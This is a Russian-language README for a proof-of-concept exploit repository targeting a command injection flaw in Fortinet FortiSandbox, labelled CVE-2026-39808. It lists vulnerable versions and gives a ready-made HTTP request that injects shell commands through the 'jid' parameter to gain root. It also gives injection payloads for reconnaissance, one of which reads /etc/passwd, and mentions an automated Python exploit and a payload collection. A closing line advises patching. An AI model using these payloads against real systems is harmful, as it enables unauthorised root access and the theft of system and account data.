
CVE-2026-39808
Этот репозиторий содержит чистое и хорошо документированное подтверждение концепции (Proof of Concept) для CVE-2026-39808 — критической уязвимости неавторизованного внедрения команд в Fortinet FortiSandbox, которая позволяет побег из песочницы и удаленное выполнение кода с правами root (uid=0).
jid
Успешная эксплуатация: uid=0 gid=0 groups=0
| Диапазон версий | Статус |
|---|---|
| FortiSandbox 4.4.0 – 4.4.8 | Уязвима |
| FortiSandbox 5.0.0 – 5.0.5 | Уязвима |
| 4.4.9+ / 5.0.6+ | Исправлено |
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip
Откройте в браузере:
https://your-lab-ip/ng/out.txt
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|
# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|
poc.py → Автоматический эксплойт на Pythonburp-request.txt → Готовый к использованию запрос Burp Suitepayloads.md → Коллекция полезных нагрузокscreenshots/ → Пошаговые изображения эксплуатацииREADME.md → Этот файлНемедленно обновите FortiSandbox до одной из следующих версий:
Fortinet выпустил официальные исправления, устраняющие данную уязвимость.
Сделано в исследовательских и образовательных целях
⭐ Поставьте звезду этому репозиторию, если он помог вам!